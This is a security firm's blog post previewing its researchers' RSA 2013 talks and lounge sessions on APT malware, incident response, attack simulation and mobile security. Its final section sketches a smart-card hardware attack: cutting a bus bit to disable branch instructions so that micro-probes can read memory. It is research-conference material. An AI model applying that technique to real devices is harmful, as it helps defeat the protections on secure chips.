RSA has grown significantly in the 10 years I’ve been attending, and this year’s edition looks to be another great event. With many great talks and networking events, tradeshows can be a whirlwind of quick hellos, forgotten names, and aching feet. For years I would return home from RSA feeling as if I hadn’t sat down in a week and lamenting all the conversations I started but never had the chance to finish. So a few years ago during my annual pre-RSA Vitamin D-boosting trip to a warm beach an idea came to me: Just as the beach served as my oasis before RSA, wouldn’t it be great to give our VIPs an oasis to escape to during RSA? And thus the first IOAsis was born.


Aside from feeding people and offering much needed massages, the IOAsis is designed to give you a trusted environment to relax and have meaningful conversations with all the wonderful folks that RSA, and the surrounding events such as BSidesSF, CSA, and AGC, attract. To help get the conversations going each year we host a number of sessions where you can join IOActive’s experts, customers, and friends to discuss some of the industry’s hottest topics. We want these to be as interactive as possible, so the following is a brief look inside some of the sessions the IOActive team will be leading.

 

(You can check out the full IOAsis schedule of events at:

Chris Valasek @nudehaberdasher

 

Hi everyone, Chris Valasek here. I just wanted to let everyone know that I will be participating in a panel in the RSA 2013 Hackers & Threats track (Session Code: HT-R31) on Feb 28 at 8:00 a.m. The other panelists and I will be giving our thoughts on the current state of attacks, malware, governance, and protections, which will hopefully give attendees insight into how we as security professionals perceive the modern threat landscape. I think it will be fun because of our varied perspectives on security and the numerous security breaches that occurred in 2012.

Second, Stephan Chenette and I will talking about assessing modern attacks against PCs at IOAsis on Wednesday at 1:00-1:45. We believe that security is too often described in binary terms — “Either you ARE secure or you are NOT secure — when computer security is not an either/or proposition. We will examine current mainstream attack techniques, how we plan non-binary security assessments, and finally why we think changes in methodologies are needed. I’d love people to attend either presentation and chat with me afterwards. See everyone at RSA 2013!

 

By Gunter Ollman @gollmann

 

My RSA talk (Wednesday at 11:20), “Building a Better APT Package,” will cover some of the darker secrets involved in the types of weaponized malware that we see in more advanced persistent threats. In particular I’ll discuss the way payloads are configured and tested to bypass the layers of defensive strata used by security-savvy victims. While most “advanced” features of APT packages are not very different from those produced by commodity malware vendors, there are nuances to the remote control features and levels of abstraction in more advanced malware that are designed to make complete attribution more difficult.

Over in the IOAsis refuge on Wednesday at 4:00 I will be leading a session with my good friend Bob Burls on “Fatal Mistakes in Incident Response.” Bob recently retired from the London Metropolitan Police Cybercrime Division, where he led investigations of many important cybercrimes and helped put the perpetrators behind bars. In this session Bob will discuss several complexities of modern cybercrime investigations and provide tips, gotcha’s, and lessons learned from his work alongside corporate incident response teams. By better understanding how law enforcement works, corporate security teams can be more successful in engaging with them and receive the attention and support they believe they need.

By Stephan Chenette @StephanChenette

 

At IOAsis this year Chris Valasek and I will be presenting on a topic that builds on my Offensive Defense talk and starts a discussion about what we can do about it.

For too long both Chris and I have witnessed the “old school security mentality” that revolves solely around chasing vulnerabilities and remediation of vulnerable machines to determine risk.  In many cases the key motivation is regulatory compliance. But this sort of mind-set doesn’t work when you are trying to stop a persistent attacker.

What happens after the user clicks a link or a zero-day attack exploits a vulnerability to gain entry into your network? Is that part of the risk assessment you have planned for? Have you only considered defending the gates of your network? You need to think about the entire attack vector: Reconnaissance, weaponization, delivery, exploitation, installation of malware, and command and control of the infected asset are all strategies that need further consideration by security professionals. Have you given sufficient thought to the motives and objectives of the attackers and the techniques they are using? Remember, even if an attacker is able to get into your network as long as they aren’t able to destroy or remove critical data, the overall damage is limited.

Chris and I are working on an R&D project that we hope will shake up how the industry thinks about offensive security by enabling us to automatically create non-invasive scenarios to test your holistic security architecture and the controls within them. Do you want those controls to be tested for the first time in a real-attack scenario, or would you rather be able to perform simulations of various realistic attacker scenarios, replayed in an automated way producing actionable and prioritized items?

Our research and deep understanding of hacker techniques enables us to catalog various attack scenarios and replay them against your network, testing your security infrastructure and controls to determine how susceptible you are today’s attacks. Join us on Wednesday at 1:00 to discuss this project and help shape its future.

 

By Tiago Asumpcao @coconuthaxor

 

 

At RSA I will participate in a panel reviewing the history of mobile security. It will be an opportunity to discuss the paths taken by the market as a whole, and an opportunity to debate the failures and victories of individual vendors.

 

Exploit mitigations, application stores and mobile malware, the wave of jail-breaking and MDM—hear the latest from the folks who spend their days and nights wrestling with modern smartphone platforms.While all members of the panel share a general experience within the mobile world, every individual brings a unique relationship with at least one major mobile industry player, giving the Mobile Security Battle Royale a touch of spice.

At IOAsis on Tuesday at 2:00 I will present the problem of malware in application stores and the privacy in mobile phones. I will talk about why it is difficult to automate malware analysis in an efficient way, and what can and cannot be done. From a privacy perspective, how can the user keep both their personal data and the enterprise’s assets separate from each other and secure within such a dynamic universe? To the enterprise, which is the biggest threat: malicious apps, remote attacks, or lost devices?
I will raise a lot of technical and strategic questions. I may not be able to answer them all, but it should make for lively and thought-provoking discussion.

 

By Chris Tarnovsky @semiconduktor
I will be discussing the inherent risks of reduced instruction set computer (RISC) processors vs. complex instruction set computer (CISC) processors at IOAsis on Tuesday at 12:00.

 

Many of today’s smart cards favor RISC architectures, ARM, AVR, and CalmRisc16 being the most popular versions seen in smartcards. Although these processors provide high performance, they pose a trade-off from a security perspective.

 

The vendors of these devices offer security in the form of sensors, active meshing, and encrypted (scrambled) memory contents. From a low-level perspective these all offer an attacker an easy way to block branch operations and make it possible to address the device’s entire memory map.

 

To prevent branches on an AVR and CalmRisc16 an attacker only needs to cut and strap the highest bit to a ‘0’. After doing so the branch instruction is impossible to execute. An instruction that should have been a branch will become something else without the branch effect, allowing an attacker to sit on the bus using only one to two micro-probing needles.

 

On the other hand, CPU architectures such as 8051 or 6805 are not susceptible to such attacks. In these cases modifying a bus is much more complicated and would require a full bus width of edits.

 

I look forward to meeting everyone!